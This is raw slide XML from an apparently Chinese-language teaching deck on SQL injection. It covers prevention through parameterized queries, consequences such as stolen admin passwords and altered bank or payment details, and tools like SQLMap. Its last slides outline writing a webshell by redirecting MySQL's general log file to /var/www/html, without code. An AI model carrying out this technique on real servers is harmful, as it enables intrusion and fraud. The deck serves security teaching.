              </a:rPr>
              <a:t>不使用动态拼接sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>，可使用参数化的sql或直接使用存储过程进行数据查询存取；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>不使用管理员权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>的数据库连接；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>对机密信息进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>加密</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>或hash掉密码和敏感信息；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>应用异常尽可能少在web提示，最好使用自定义信息对应用的异常信息进行包装；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>采用工具或网络平台</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>检测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>是否存在SQL注入。</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709082" y="18138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SQL注入防护</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709082" y="181382"/>
              <a:ext cx="53124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SQL注入防护</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代码与数据分开</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="35104" t="45000" r="25938" b="44074"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="922200" y="1598088"/>
            <a:ext cx="7247663" cy="1143348"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="组合 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="919480" y="2942590"/>
            <a:ext cx="9513570" cy="2977515"/>
            <a:chOff x="1448" y="4634"/>
            <a:chExt cx="14982" cy="4689"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="Picture 3"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3"/>
            <a:srcRect l="34687" t="58832" r="25958" b="12434"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1448" y="4634"/>
              <a:ext cx="11418" cy="4689"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="TextBox 5"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13080" y="5529"/>
              <a:ext cx="2327" cy="727"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0"/>
                <a:t>Send code</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="TextBox 7"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13080" y="6348"/>
              <a:ext cx="2244" cy="727"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0"/>
                <a:t>Send data</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="10" name="Straight Arrow Connector 9"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="8" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10750" y="5893"/>
              <a:ext cx="2330" cy="5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a:off x="10750" y="6712"/>
              <a:ext cx="2330" cy="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3146" y="7168"/>
              <a:ext cx="3284" cy="727"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0"/>
                <a:t>Start </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
                <a:t>execusion</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="17" name="Straight Arrow Connector 16"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="15" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="10750" y="7026"/>
              <a:ext cx="2396" cy="5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1736090" y="960120"/>
            <a:ext cx="5669280" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="10" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="经典特宋简" pitchFamily="49" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>代码与数据分开，强迫使用参数化语句。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1118152" y="3920987"/>
            <a:ext cx="5655365" cy="795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7820" y="6008370"/>
            <a:ext cx="10841355" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="10" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="经典特宋简" pitchFamily="49" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用预编译语句，摆脱了SQL语句的动态构造过程，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="经典特宋简" pitchFamily="49" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>避免数据变成代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="10" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="经典特宋简" pitchFamily="49" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>被执行。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904962"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SQL注入攻击后果</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1927860" y="1296670"/>
            <a:ext cx="9100820" cy="2803332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="pingfang SC"/>
              </a:rPr>
              <a:t>查询</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="pingfang SC"/>
              </a:rPr>
              <a:t>网站管理员的账号密码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="pingfang SC"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="pingfang SC"/>
              </a:rPr>
              <a:t>修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="pingfang SC"/>
              </a:rPr>
              <a:t>网站会员的提现银行卡</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="pingfang SC"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="pingfang SC"/>
              </a:rPr>
              <a:t>修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="pingfang SC"/>
              </a:rPr>
              <a:t>网站的支付接口，支付账号</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="pingfang SC"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="pingfang SC"/>
              </a:rPr>
              <a:t>通过数据库篡改注单，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="pingfang SC"/>
              </a:rPr>
              <a:t>修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="pingfang SC"/>
              </a:rPr>
              <a:t>投注记录、修改会员密码或者会员的认证资料，银行卡等</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"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6235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SQL注入攻击学习平台</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1927860" y="1296670"/>
            <a:ext cx="9100820" cy="4523105"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQLi-Labs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>SQLi-Labs是一个专业的SQL注入练习平台</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQLMap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>SQLMap是一款开源渗透测试工具，可用于自动检测和利用SQL注入漏洞，并接管数据库服务器。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jSQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>jSQL Injection是一个轻量级的应用程序，用于从远程服务器查找数据库信息。jSQL是免费的，开源的和可多平台使用的（Windows，Linux，Mac OS X，Solaris）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="24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150" y="693952"/>
            <a:ext cx="12077065" cy="5707483"/>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059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SQL注入总结</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315" y="878259"/>
            <a:ext cx="8324663" cy="583445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6492CD-69F2-ACA0-64CF-795F372C4BAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133488" y="4182855"/>
            <a:ext cx="10058512" cy="392399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8E7D60F-F740-3BF8-8038-4619B33D6693}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2275078" y="4666108"/>
            <a:ext cx="1646756" cy="1425637"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69831909-D24A-22E9-6E5D-ED2B03D04EEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2465832" y="110728"/>
            <a:ext cx="7772400" cy="4032297"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1323855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205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656" y="1176711"/>
            <a:ext cx="9717741" cy="4504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409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350" y="1013452"/>
            <a:ext cx="10264344" cy="5241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682" y="1723862"/>
            <a:ext cx="7055317" cy="503784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336800" y="878259"/>
            <a:ext cx="6096000" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="pingfang SC"/>
              </a:rPr>
              <a:t>找到变量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="pingfang SC"/>
              </a:rPr>
              <a:t>general log file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="pingfang SC"/>
              </a:rPr>
              <a:t>并修改该变量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="pingfang SC"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="pingfang SC"/>
              </a:rPr>
              <a:t>系统为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FC5531"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="pingfang SC"/>
              </a:rPr>
              <a:t>系统，后台的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="pingfang SC"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="pingfang SC"/>
              </a:rPr>
              <a:t>根路径应该是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="pingfang SC"/>
              </a:rPr>
              <a:t>/var/www/html;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3074"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530" y="934352"/>
            <a:ext cx="8219000" cy="58273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614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687" y="1143199"/>
            <a:ext cx="8523292" cy="533554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121647" y="773867"/>
            <a:ext cx="6096000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="pingfang SC"/>
              </a:rPr>
              <a:t>点击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="pingfang SC"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="pingfang SC"/>
              </a:rPr>
              <a:t>，写入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="pingfang SC"/>
              </a:rPr>
              <a:t>webshell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4F4F4F"/>
              </a:solidFill>
              <a:effectLst/>
